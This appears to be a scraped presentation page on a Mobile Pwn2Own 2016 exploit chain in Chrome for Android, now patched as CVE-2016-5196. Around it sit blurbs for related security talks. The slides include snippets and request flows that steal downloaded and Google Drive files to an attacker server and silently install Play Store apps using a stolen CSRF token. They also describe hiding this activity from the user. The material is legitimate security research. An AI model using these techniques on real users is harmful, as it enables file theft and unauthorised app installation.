The document describes several logic flaws in Chrome on Android that could be exploited. It discusses exploiting automatic file downloads to steal downloaded files or files from Google Drive by tricking the browser into downloading malicious files. It also describes using cross-site request forgery tokens and device IDs to programmatically install arbitrary apps from the Google Play store. The presentation aims to show how understanding application logic can lead to powerful "logic bug" exploits beyond simple memory corruption issues.
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
After successfully attacking an endpoint and gaining a foothold there, sophisticated attackers know that to get to the valuable data within an organization they must quietly pivot. From reconnaissance to escalation of privileges to stealing credentials, learn about the tactics and tools that attackers are using today.
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoShakacon
Since 2014, fifteen new malware or riskware families successfully attacked non-jailbroken iOS devices (e.g., WireLurker, Oneclickfraud, XcodeGhost, InstaAgent, ZergHelper, AceDeceiver), affected thousands of iOS apps and tens of millions users around the world. Ten of them even bypassed Apple’s code vetting and occurred at App Store. In this presentation, we will systematically study how could these malware, riskware and some Proof-of-Concepts infect non-jailbroken devices via practical vectors and approaches including abusing development certificates, bypassing code review by obfuscation, performing FairPlay MITM attack, abusing MDM solution, abusing private APIs, exploiting design flaws or app level vulnerabilities, and stealing privacy data. For each topic, we will introduce its implementation, explore real world cases, analyze its risky and consequences, explain Apple’s countermeasures, and discuss why some problems will still exist in near future. We will also share some stories of how we discovered those interesting iOS malware. Through this topic, audiences could make more effective policies to protect iOS devices in their organizations, build their own systems/tools to evaluate security risks in iOS apps, and hunt more iOS malware in the future.
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
After successfully attacking an endpoint and gaining a foothold there, sophisticated attackers know that to get to the valuable data within an organization they must quietly pivot. From reconnaissance to escalation of privileges to stealing credentials, learn about the tactics and tools that attackers are using today.
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud XiaoShakacon
Since 2014, fifteen new malware or riskware families successfully attacked non-jailbroken iOS devices (e.g., WireLurker, Oneclickfraud, XcodeGhost, InstaAgent, ZergHelper, AceDeceiver), affected thousands of iOS apps and tens of millions users around the world. Ten of them even bypassed Apple’s code vetting and occurred at App Store. In this presentation, we will systematically study how could these malware, riskware and some Proof-of-Concepts infect non-jailbroken devices via practical vectors and approaches including abusing development certificates, bypassing code review by obfuscation, performing FairPlay MITM attack, abusing MDM solution, abusing private APIs, exploiting design flaws or app level vulnerabilities, and stealing privacy data. For each topic, we will introduce its implementation, explore real world cases, analyze its risky and consequences, explain Apple’s countermeasures, and discuss why some problems will still exist in near future. We will also share some stories of how we discovered those interesting iOS malware. Through this topic, audiences could make more effective policies to protect iOS devices in their organizations, build their own systems/tools to evaluate security risks in iOS apps, and hunt more iOS malware in the future.
Practical White Hat Hacker Training - Introduction to Cyber SecurityPRISMA CSI
This presentation part of Prisma CSI's Practical White Hat Hacker Training v1
PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com
This document can be shared or used by quoted and used for commercial purposes, but can not be changed. Detailed information is available at https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.
The Dark Side of PowerShell by George DobreaEC-Council
PowerShell is now a ‘mandatory-to-use’ tool for IT professionals in order to automate administration of the Windows OS and applications, including Azure and Nano Server. Unfortunately, threat actors have recently taken advantage of this powerful scripting language just because PowerShell it’s already installed on your Windows machines, trusted by Admins and most AntiVirus tools! The session presents the steps that should get you starting on (Ethical) Hacking and Pen Testing with PowerShell and some new techniques like JEA (Just Enough Administration) that a defender can use in order to limit the effectiveness of PowerShell attacks.
Practical White Hat Hacker Training - Post ExploitationPRISMA CSI
This presentation part of Prisma CSI's Practical White Hat Hacker Training v1
PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com
This document can be shared or used by quoted and used for commercial purposes, but can not be changed. Detailed information is available at https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...CODE BLUE
Malware utilize many cryptographic algorithms.
To fight against malware, analysts have to reveal details on malware activities.
Accordingly, it is important to identify cryptographic algorithms used in malware.
In this track, I propose a faster and extensible method to automatically detect known cryptographic algorithms in malware using dynamic binary instrumentation and fuzzy hashing.
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...CODE BLUE
Windows 10 IoT was released as a platform for IoT.
Windows 10 IoT Core, which is the lightest among Windows 10 IoT, is usable without charge, and can be run on single board computers like Raspberry Pi. So far, Linux-based platforms were considered as the platform for IoT devices, but now there is another option.
We conducted research on security system of Windows 10 IoT Core to judge whether it could be used safely.
We investigated the security design, the security functions, and default services, such as Web, FTP, and SSH, served by this OS. Furthermore, we also analyzed risks of intrusion and malware infection.
As a result of the investigation, like the newest Windows, we found that DEP, ASLR and CFG are also effective as countermeasures for being attacked vulnerabilities that affect the main memory. These countermeasures are not omitted from Windows 10 IoT Core.
On the other hand, we also found some designs and default settings of services and components are insecure.
For example, Windows update is disabled, Windows Firewall is disabled by default settings, Web interface is served on HTTP, and its authentication is basic authentication.
Moreover, we found a problem in the design of the remote debug service. This problem allows an attacker to create any user account and intrude using the web interface or SSH. Therefore, this problem might be abused by worm malware.
Lastly, we will introduce recommended security measures such as disabling unused services, changing settings, enabling the firewall, enabling web interface on HTTPS, etc.
For #Redpill2017, The most offensive security conference in Thailand.
This slide talks about the weak point of endpoint protection such as Antivirus, User Account Control, AppLocker.
Matt Oh, Microsoft
We are seeing new technique used everyday by malware. But, it is very hard to find any impressive techniques used in the wild. Recently there was huge buzz about Detrahere malware which used internally known issues with certificate signing in Windows 10 kernel driver. Even though the certificate check bypass technique itself is very interesting, also I found that the tactics used by the malware is more impressive. Even though the malware is mainly focused on Ad-hijacking functionality through Netfilter driver installation, but it also has rootkit ability through file system driver hooking. This feels like old days coming back with various new arsenals. The rootkit detects kernel debugging settings and will destroy the system when it finds one. The unpacking process can be very challenging job, too as it uses kernel driver image hollowing technique (something similar to process hollowing) to deobfuscate itself and run unpacked code. Our patchguard doesn't seem like triggering on this action, because all the sections are pre-allocated with execute permission already.
Through this talk, I want to present various techniques used by this malware focusing on the kernel level obfuscation and anti-analysis tactics. This will give us new insights on how new Windows rootkit malware might look like in the future and how detecting them from security systems and detonation systems can be a challenge.
Jagadeesh Parameswaran, Microsoft
Rahul Sachan, Microsoft
Windows Defender Advanced Threat Protection (WDATP) gives defenders unparalleled visibility into the enterprise. And Azure Advanced Threat Protection (AATP) gives the power to monitor attacks on the Domain Controllers and user identities. Come spend an hour with us as we pull back the covers and go through detailed examples of real attacks that we saw as we defended the Microsoft corporate environment using WDATP & AATP.
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
On June, thousands of Facebook users complained that they had been infected by a virus through their accounts after they received a message from a Facebook friend claiming they had mentioned them in a comment. Kaspersky Lab researcher Ido Naor and Dani Goland, CEO & founder of Undot, decided to investigate. They quickly discovered that the message had in fact been initiated by attackers and unleashed a two-stage attack on recipients. The first stage of the attack started when the user clicked on the “mention”. A malicious file seized control of their browsers, terminating its legitimate session and replacing it with a malicious one that captured their entire web traffic. The second stage included a highly sophisticated script that took over victims Facebook and Google Drive accounts. After puzzling the script, they managed to extract the proverbial needle from a haystack: an unknown Facebook vulnerability that allowed an attacker to exploit the notifications functionality.
In this talk, Dani and Ido will dive into the bites and bytes of the campaign and explaining how the attackers exploited Facebook to spread the malware.
--- Ido Naor
Ido is a senior security researcher at the Global Research & Analysis Team (GReAT), Kaspersky Lab. He joined Kaspersky two years ago and is leading the regional research in Israel.
Ido specializes in malware analysis, penetration testing and software reverse engineering and has been credited for his work by major enterprises such as: Google, Facebook, Linkedin, Alibaba and more.
Aside from research, Ido is a martial arts expert and a father of two daughters.
--- Dani Goland
Dani is the CEO and founder of Undot, an Israeli-based startup that developed a unified remote-control application to control home appliances.
Dani has more than a decade of experience in programming on a variety of frameworks and languages.
Aside from managing Undot, Dani is a frequent competitor in Hackathons (programming competitions) and won 1st places at HackTrackTLV 2016 and eBay Hackathon 2015.
Practical White Hat Hacker Training - Introduction to Cyber SecurityPRISMA CSI
This presentation part of Prisma CSI's Practical White Hat Hacker Training v1
PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com
This document can be shared or used by quoted and used for commercial purposes, but can not be changed. Detailed information is available at https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.
The Dark Side of PowerShell by George DobreaEC-Council
PowerShell is now a ‘mandatory-to-use’ tool for IT professionals in order to automate administration of the Windows OS and applications, including Azure and Nano Server. Unfortunately, threat actors have recently taken advantage of this powerful scripting language just because PowerShell it’s already installed on your Windows machines, trusted by Admins and most AntiVirus tools! The session presents the steps that should get you starting on (Ethical) Hacking and Pen Testing with PowerShell and some new techniques like JEA (Just Enough Administration) that a defender can use in order to limit the effectiveness of PowerShell attacks.
Practical White Hat Hacker Training - Post ExploitationPRISMA CSI
This presentation part of Prisma CSI's Practical White Hat Hacker Training v1
PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com
This document can be shared or used by quoted and used for commercial purposes, but can not be changed. Detailed information is available at https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...CODE BLUE
Malware utilize many cryptographic algorithms.
To fight against malware, analysts have to reveal details on malware activities.
Accordingly, it is important to identify cryptographic algorithms used in malware.
In this track, I propose a faster and extensible method to automatically detect known cryptographic algorithms in malware using dynamic binary instrumentation and fuzzy hashing.
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...CODE BLUE
Windows 10 IoT was released as a platform for IoT.
Windows 10 IoT Core, which is the lightest among Windows 10 IoT, is usable without charge, and can be run on single board computers like Raspberry Pi. So far, Linux-based platforms were considered as the platform for IoT devices, but now there is another option.
We conducted research on security system of Windows 10 IoT Core to judge whether it could be used safely.
We investigated the security design, the security functions, and default services, such as Web, FTP, and SSH, served by this OS. Furthermore, we also analyzed risks of intrusion and malware infection.
As a result of the investigation, like the newest Windows, we found that DEP, ASLR and CFG are also effective as countermeasures for being attacked vulnerabilities that affect the main memory. These countermeasures are not omitted from Windows 10 IoT Core.
On the other hand, we also found some designs and default settings of services and components are insecure.
For example, Windows update is disabled, Windows Firewall is disabled by default settings, Web interface is served on HTTP, and its authentication is basic authentication.
Moreover, we found a problem in the design of the remote debug service. This problem allows an attacker to create any user account and intrude using the web interface or SSH. Therefore, this problem might be abused by worm malware.
Lastly, we will introduce recommended security measures such as disabling unused services, changing settings, enabling the firewall, enabling web interface on HTTPS, etc.
For #Redpill2017, The most offensive security conference in Thailand.
This slide talks about the weak point of endpoint protection such as Antivirus, User Account Control, AppLocker.
Matt Oh, Microsoft
We are seeing new technique used everyday by malware. But, it is very hard to find any impressive techniques used in the wild. Recently there was huge buzz about Detrahere malware which used internally known issues with certificate signing in Windows 10 kernel driver. Even though the certificate check bypass technique itself is very interesting, also I found that the tactics used by the malware is more impressive. Even though the malware is mainly focused on Ad-hijacking functionality through Netfilter driver installation, but it also has rootkit ability through file system driver hooking. This feels like old days coming back with various new arsenals. The rootkit detects kernel debugging settings and will destroy the system when it finds one. The unpacking process can be very challenging job, too as it uses kernel driver image hollowing technique (something similar to process hollowing) to deobfuscate itself and run unpacked code. Our patchguard doesn't seem like triggering on this action, because all the sections are pre-allocated with execute permission already.
Through this talk, I want to present various techniques used by this malware focusing on the kernel level obfuscation and anti-analysis tactics. This will give us new insights on how new Windows rootkit malware might look like in the future and how detecting them from security systems and detonation systems can be a challenge.
Jagadeesh Parameswaran, Microsoft
Rahul Sachan, Microsoft
Windows Defender Advanced Threat Protection (WDATP) gives defenders unparalleled visibility into the enterprise. And Azure Advanced Threat Protection (AATP) gives the power to monitor attacks on the Domain Controllers and user identities. Come spend an hour with us as we pull back the covers and go through detailed examples of real attacks that we saw as we defended the Microsoft corporate environment using WDATP & AATP.
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani GolandCODE BLUE
On June, thousands of Facebook users complained that they had been infected by a virus through their accounts after they received a message from a Facebook friend claiming they had mentioned them in a comment. Kaspersky Lab researcher Ido Naor and Dani Goland, CEO & founder of Undot, decided to investigate. They quickly discovered that the message had in fact been initiated by attackers and unleashed a two-stage attack on recipients. The first stage of the attack started when the user clicked on the “mention”. A malicious file seized control of their browsers, terminating its legitimate session and replacing it with a malicious one that captured their entire web traffic. The second stage included a highly sophisticated script that took over victims Facebook and Google Drive accounts. After puzzling the script, they managed to extract the proverbial needle from a haystack: an unknown Facebook vulnerability that allowed an attacker to exploit the notifications functionality.
In this talk, Dani and Ido will dive into the bites and bytes of the campaign and explaining how the attackers exploited Facebook to spread the malware.
--- Ido Naor
Ido is a senior security researcher at the Global Research & Analysis Team (GReAT), Kaspersky Lab. He joined Kaspersky two years ago and is leading the regional research in Israel.
Ido specializes in malware analysis, penetration testing and software reverse engineering and has been credited for his work by major enterprises such as: Google, Facebook, Linkedin, Alibaba and more.
Aside from research, Ido is a martial arts expert and a father of two daughters.
--- Dani Goland
Dani is the CEO and founder of Undot, an Israeli-based startup that developed a unified remote-control application to control home appliances.
Dani has more than a decade of experience in programming on a variety of frameworks and languages.
Aside from managing Undot, Dani is a frequent competitor in Hackathons (programming competitions) and won 1st places at HackTrackTLV 2016 and eBay Hackathon 2015.
Attacking and Defending Mobile ApplicationsJerod Brennen
The rapid increase in mobile technology adoption in the workplace has resulted in a rise in mobile application attacks. This presentation provides attendees with insight into how mobile application attacks are perpetuated, as well as how we can develop to defend against them.
Web-App Remote Code Execution Via Scripting Engines by Rahul Sasi at c0c0n - International Cyber Security and Policing Conference http://is-ra.org/c0c0n/speakers.html
13 practical tips for writing secure golang applicationsKarthik Gaekwad
Writing secure applications in a new language is challenging. Here are some tips to help get you started for writing secure code in golang. Presented at Lascon 2015
"I haz you and pwn your maal" by Harsimran Walia @b44nz0r at c0c0n - International Cyber Security and Policing Conference http://is-ra.org/c0c0n/speakers.html
Basic overview, testing, mitigation plan for popular web application vulnerabilities such as: XSS, CSRF, SQLi etc.
Updated "Web Security - Introduction" presentation.
This talk shows the possibilities of reversing Android applications. After an introduction about Android issues in the past, Tobias Ospelt explains how he managed to download several thousand Android applications from the Google Market, and which security issues are present in various apps. Apps can be decompiled, altered and recompiled, which means that for most apps it is very easy to steal code or to include malware. Some of the apps use obfuscation to disguise the code, but for example encryption keys can easily be extracted. Small game developers, as well as big companies are not aware of the risk that their code can be decompiled to java and disassembled to smali code. This is how a lot of protection mechanisms can be circumvented, such as licensing (cracking a Game) or corporate solutions (enforcing policies on the mobile). The talk shows how easy everybody can reverse android apps and how encryption keys can be extracted, even when the code is obfuscated. The material is a nice follow-up to the Android talk of Jesse Burns from last year at #days, although this talk is more focused on the apps and shows some more hacks/code/encryption/obfuscation/reversing.
Bio: Tobias Ospelt is working as a security expert and tester for Dreamlab Technologies AG in Bern. He is mainly involved in web application and mobile security penetration tests. Tobias Ospelt joined Dreamlab after having achieved his Master Degree focusing IT-Security, and after having worked as a Research Assistant at the Zurich University of Applied Sciences.
Multi-cluster Kubernetes Networking- Patterns, Projects and GuidelinesSanjeev Rampal
Talk presented at Kubernetes Community Day, New York, May 2024.
Technical summary of Multi-Cluster Kubernetes Networking architectures with focus on 4 key topics.
1) Key patterns for Multi-cluster architectures
2) Architectural comparison of several OSS/ CNCF projects to address these patterns
3) Evolution trends for the APIs of these projects
4) Some design recommendations & guidelines for adopting/ deploying these solutions.
This 7-second Brain Wave Ritual Attracts Money To You.!nirahealhty
Discover the power of a simple 7-second brain wave ritual that can attract wealth and abundance into your life. By tapping into specific brain frequencies, this technique helps you manifest financial success effortlessly. Ready to transform your financial future? Try this powerful ritual and start attracting money today!
ER(Entity Relationship) Diagram for online shopping - TAEHimani415946
https://bit.ly/3KACoyV
The ER diagram for the project is the foundation for the building of the database of the project. The properties, datatypes, and attributes are defined by the ER diagram.
1.Wireless Communication System_Wireless communication is a broad term that i...JeyaPerumal1
Wireless communication involves the transmission of information over a distance without the help of wires, cables or any other forms of electrical conductors.
Wireless communication is a broad term that incorporates all procedures and forms of connecting and communicating between two or more devices using a wireless signal through wireless communication technologies and devices.
Features of Wireless Communication
The evolution of wireless technology has brought many advancements with its effective features.
The transmitted distance can be anywhere between a few meters (for example, a television's remote control) and thousands of kilometers (for example, radio communication).
Wireless communication can be used for cellular telephony, wireless access to the internet, wireless home networking, and so on.
2. Agenda
• Fuzzing and memory corruptions
• Introduction to logic flaws
• General approach to hunting logic bugs
• Application in Mobile Pwn2Own 2016
• Exploit improvement
4. Fuzzing and Pwn2Own
• Fuzzing has become mainstream
• AFL, LibFuzzer, Radamsa, Honggfuzz, etc.
• It’s almost too easy…
• People find and kill bugs they rarely understand…
• Increasing likelihood of duplicates
• libstagefright, Chrome, etc.
• Code changes
• Improved exploit mitigations
5. Android Mitigations
• More and better security mechanisms
• Improved rights management, SELinux, TrustZone
• ASLR, DEP, PIE, RELRO, PartitionAlloc, Improved GC
• Significant increase in exploit development time
• Multiple bugs are usually chained together
• PoC isn’t enough for the competition
• We can’t afford spending too much time on Pwn2Own
6. Memory Corruptions vs. Logic
Flaws
• Memory corruptions
• Programming errors
• Memory safety violations
• Architecture-dependent
• General mitigations
• Logic flaws
• Design vulnerabilities
• Intended behaviour
• Architecture-agnostic
• Lack of general mitigation mechanisms
7. We Love Logic Bugs
• Equally beautiful and hilarious vectors
• Basic tools
• Actual exploits might be somewhat convoluted
Q: How many bugs do you have in your chain?
A: We abuse one and a half features.
Q: What tool did you use to find that bug?
A: Notepad.
12. Identifying Logic Flaws
• I don’t know what I’m doing…
• Lack of one-size-fits-all methodology
• Thou shalt know thy target
• Less known or obscure features
• Trust boundaries and boundary violations
• Threat modelling
16. Mobile Pwn2Own 2016
“All entries must compromise the devices by browsing to web content
[…] or by viewing/receiving an MMS/SMS message.”
http://zerodayinitiative.com/MobilePwn2Own2016Rules.html
Category Phone Price (USD)
Obtaining Sensitive
Information
Apple iPhone $50,000
Google Nexus $50,000
Samsung Galaxy $35,000
Install Rogue
Application
Apple iPhone $125,000
Google Nexus $100,000
Samsung Galaxy $60,000
Force Phone Unlock Apple iPhone $250,000
17. Where do we start?
• Ruling out SMS/MMS
• Limited to media rendering bugs
• Chrome
• Core components
• URI handlers
• IPC to other applications
20. Google Admin
public void onCreate(Bundle arg3) {
this.c = this.getIntent().getExtras().getString("setup_url");
this.b.loadUrl(this.c);
// ...
}
ResetPinActivity.java
21. Google Admin
• Attacking with malware
adb shell am start
–d http://localhost/foo
-e setup_url file:////data/data/com.malware/file.html
22. Google Admin
Chrome
file:///tmp/foo.html
Uncaught DOMException: Blocked a frame with origin "null" from accessing a
cross-origin frame.
<HTML><BODY>
<IFRAME SRC="file:///tmp/foo.html" id="foo"
onLoad="console.log(document.getElementById('foo').contentDocument.body.innerHTML);">
</IFRAME>
</BODY></HTML>
23. Google Admin
Chrome on Android API 17
file:///sdcard/foo.html
Yep, that’s fine!
<HTML><BODY>
<IFRAME SRC="file:///sdcard/foo.html" id="foo"
onLoad="console.log(document.getelementById('foo').contentDocument.body.innerHTML);">
</IFRAME>
</BODY></HTML>
24. Google Admin
• Malicious app creates a world readable file, e.g. foo.html
• foo.html will load an iframe with src = “foo.html”
after a small delay
• Sends a URL for foo.html to Google Admin via IPC
• Change foo.html to be a symbolic link pointing to a file in the
Google Admin’s sandbox
• Post file contents back to a web server
25. Same-Origin Policy
• Chrome for Android vs. Chrome
• Different SOP
• Custom Android schemes
• Worth investigating…
26. SOP in Chrome for Android
HTTP / HTTPS Scheme, domain and port number must match.
FILE
Full file path for origin until API 23. Starting with API 24, all origins are
now NULL.
CONTENT Scheme, domain and port number must match.
DATA All origins are NULL.
28. Android Content Providers
• Implement data repositories
• Exportable for external access
• Declared in AndroidManifest.xml
• Read and write access control
• Content URIs
• Combination of ‘authority’ and ‘path’
• content://<authority><path>
• content://downloads/my_downloads/45
• What about SOP?
29. Android Download Manager
• System service that handles long-running HTTP downloads
• Back to SOP…
content://downloads/my_downloads/45
content://downloads/my_downloads/46
content://downloads/my_downloads/102
30. Automatic File Downloads
• Thank you, HTML5!
• Confirmed to work in Chrome
• <a href=“foo.html” download>
• <a href=“foo.html” download=“bar.html">
• Zero user interaction
• Link click using JavaScript
• Perfect for Pwn2Own
32. Exploit #1 – Stealing
Downloaded Files
GET /index.html
index.html
Attacker’s
Web Server
Victim’s
Browser
Android
Download Manager
33. Exploit #1 – Stealing
Downloaded Files
GET /index.html
index.html
https://attacker.com/index.html
Attacker’s
Web Server
Victim’s
Browser
Android
Download Manager
34. Exploit #1 – Stealing
Downloaded Files
GET /index.html
index.html
GET /evil.html
evil.html (download)
evil.html (download)
Attacker’s
Web Server
Victim’s
Browser
Android
Download Manager
35. Exploit #1 – Stealing
Downloaded Files
GET /index.html
index.html
GET /evil.html
evil.html (download)
evil.html (download)
https://attacker.com/index.html
Attacker’s
Web Server
Victim’s
Browser
Android
Download Manager
36. Exploit #1 – Stealing
Downloaded Files
GET /index.html
index.html
GET /evil.html
evil.html (download)
evil.html (download)
GET my_downloads/54
evil.html
Attacker’s
Web Server
Victim’s
Browser
Android
Download Manager
37. Exploit #1 – Stealing
Downloaded Files
GET /index.html
index.html
GET /evil.html
evil.html (download)
evil.html (download)
GET my_downloads/54
evil.html
content://downloads/my_downloads/54
Attacker’s
Web Server
Victim’s
Browser
Android
Download Manager
38. Exploit #1 – Stealing
Downloaded Files
GET /index.html
index.html
GET /evil.html
evil.html (download)
evil.html (download)
GET my_downloads/54
evil.html
GET my_downloads/53
secrets.pdf
secrets.pdf
Attacker’s
Web Server
Victim’s
Browser
Android
Download Manager
39. Mobile Pwn2Own 2016
Category Phone Price (USD)
Obtaining Sensitive
Information
Apple iPhone $50,000
Google Nexus $50,000
Samsung Galaxy $35,000
Install Rogue Application
Apple iPhone $125,000
Google Nexus $100,000
Samsung Galaxy $60,000
Force Phone Unlock Apple iPhone $250,000
40. Exploit Enhancement
• Downloading arbitrary files
• User sessions
<a id='foo' href='https://drive.google.com/my_drive.html' download> link </a>
<script>
document.getElementById('foo').click();
</script>
43. evil.html (download)
Exploit #2 – Stealing Google
Drive Files
GET my_downloads/54
evil.html
Attacker’s
Web Server
Google Drive
Web Server
Victim’s
Browser
Android
Download Manager
44. evil.html (download)
Exploit #2 – Stealing Google
Drive Files
GET my_downloads/54
evil.html
Attacker’s
Web Server
Google Drive
Web Server
Victim’s
Browser
Android
Download Manager
content://downloads/my_downloads/54
47. evil.html (download)
my_drive.html
(download)
GET /my_drive.html
Exploit #2 – Stealing Google
Drive Files
GET my_downloads/54
evil.html
GET my_downloads/55
my_drive.html
my_drive.html (download)
bounce.html
GET /bounce.html
Attacker’s
Web Server
Google Drive
Web Server
Victim’s
Browser
Android
Download Manager
https://attacker.com/bounce.html
48. evil.html (download)
my_drive.html
(download)
GET /my_drive.html
Exploit #2 – Stealing Google
Drive Files
GET my_downloads/54
evil.html
GET my_downloads/55
my_drive.html
my_drive.html (download)
bounce.html
history.back();
GET /bounce.html
Attacker’s
Web Server
Google Drive
Web Server
Victim’s
Browser
Android
Download Manager
content://downloads/my_downloads/54
49. evil.html (download)
my_drive.html
(download)
GET /my_drive.html
Exploit #2 – Stealing Google
Drive Files
GET my_downloads/54
evil.html
GET my_downloads/55
my_drive.html
my_drive.html (download)
bounce.html
GET /img?id=12345678
img_foo.jpg
(download)
history.back();
GET /bounce.html
Attacker’s
Web Server
Google Drive
Web Server
Victim’s
Browser
Android
Download Manager
50. evil.html (download)
my_drive.html
(download)
GET /my_drive.html
Exploit #2 – Stealing Google
Drive Files
GET my_downloads/54
evil.html
GET my_downloads/55
my_drive.html
my_drive.html (download)
bounce.html
GET /img?id=12345678
img_foo.jpg
(download)
POST /exfiltrate
history.back();
img_foo.jpg (download)
GET my_downloads/56
my_drive.html
GET /bounce.html
Attacker’s
Web Server
Google Drive
Web Server
Victim’s
Browser
Android
Download Manager
53. Mobile Pwn2Own 2016
Category Phone Price (USD)
Obtaining Sensitive
Information
Apple iPhone $50,000
Google Nexus $50,000
Samsung Galaxy $35,000
Install Rogue Application
Apple iPhone $125,000
Google Nexus $100,000
Samsung Galaxy $60,000
Force Phone Unlock Apple iPhone $250,000
54. Bettererer Exploit
• We can also make POST requests
• Download pages containing CSRF token
• Use CSRF token in POST request
• We’ve got everything now…
55. Exploit #3 – Install APK from
Play Store
• Grab a CSRF token
https://play.google.com/store
• Grab victim’s device ID
sa
https://play.google.com/settings
• Install APK via POST request using CSRF token and device ID
function(){window._uc='[x22Kx1pa-cDQOe_1C6Q0J2ixtQT22:1477462478689x22,
x220x22, x22enx22,x22GBx22,
<tr class="excPab-rAew03" id="g1921daaeef107b4" data-device-id="
g1921daaeef107b4" data-nickname="" data-visible="true" jsname="fscTHd">
id=com.mylittlepony.game&device=g1921daaeef107b4&token=Ka1pa-
dDQOe_1C6Q0J2ixtQT32:1477462478689
https://play.google.com/store/install?authuser=0
56. Exploit #3 – Install APK from
Play Store
evil.html
Attacker’s
Web Server
Google Play
Web Server
Victim’s
Browser
Android
Download Manager
57. Exploit #3 – Install APK from
Play Store
evil.html
Attacker’s
Web Server
Google Play
Web Server
Victim’s
Browser
Android
Download Manager
content://downloads/my_downloads/54
58. store.html (download)
GET /store.html
Exploit #3 – Install APK from
Play Store
evil.html
store.html (download)
GET /bounce.html
bounce.html
Attacker’s
Web Server
Google Play
Web Server
Victim’s
Browser
Android
Download Manager
https://attacker.com/bounce.html
59. store.html (download)
GET /store.html
Exploit #3 – Install APK from
Play Store
evil.html
store.html (download)
history.back();
GET /bounce.html
bounce.html
Attacker’s
Web Server
Google Play
Web Server
Victim’s
Browser
Android
Download Manager
content://downloads/my_downloads/54
60. store.html (download)
GET /store.html
GET my_downloads/55
store.html
settings.html
(download)
GET /settings.html
Exploit #3 – Install APK from
Play Store
evil.html
store.html (download)
history.back();
settings.html (download)
GET /bounce.html
bounce.html
Attacker’s
Web Server
Google Play
Web Server
Victim’s
Browser
Android
Download Manager
61. store.html (download)
GET /store.html
GET my_downloads/55
store.html
POST /install
settings.html
(download)
GET /settings.html
Exploit #3 – Install APK from
Play Store
evil.html
store.html (download)
history.back();
settings.html (download)
GET /bounce.html
bounce.html
Attacker’s
Web Server
Google Play
Web Server
Victim’s
Browser
Android
Download Manager
GET my_downloads/56
settings.html
62. Mobile Pwn2Own 2016
Category Phone Price (USD)
Obtaining Sensitive
Information
Apple iPhone $50,000
Google Nexus $50,000
Samsung Galaxy $35,000
Install Rogue Application
Apple iPhone $125,000
Google Nexus $100,000
Samsung Galaxy $60,000
Force Phone Unlock Apple iPhone $250,000
63. Keep calm and… aw, snap!
• Pending Chrome update?!
• Automatic updates failed us
• Segmentation fault from AJAX requests
• Never had time to investigate
• Can still use HTML forms to POST back
• Absolute mess compared to AJAX
65. Exploit Improvement
• Removing Pwn2Own debugging
• Completely removing AJAX
• Moving the bulk of the logic off to the agent
• Intelligent agent
• Less C&C traffic
• Hiding malicious activities from the user
66. Changing Focus
• Prompt for redirecting to another application
• Media players, PDF readers and other applications
• <a href=‘rtsp://sexy.time.gov.uk/cam1’>Click me!</a>
• In focus test in JavaScript
• document.hidden == true
67. Toasts
• Small popups at the bottom of the screen
• Automatic file downloads
• “Downloading…”
69. Going Further
• Wait for the screen to get locked?
• JS is slightly delayed when the browser isn’t in focus, or the lock
screen is activated
• Loop JS function every 100 ms
• Test time passed since last function call
70. How realistic is this?
700
750
800
850
900
950
1000
1050
1100
Minimised
71. How realistic is this?
700
750
800
850
900
950
1000
1050
1100
Minimised Locked
72. The Patch
• CVE-2016-5196
• Chromium Bug ID 659492
• The content scheme is now a local scheme
• Similar to file:// scheme
• Cannot redirect from http:// to content://
• Cannot read other content:// files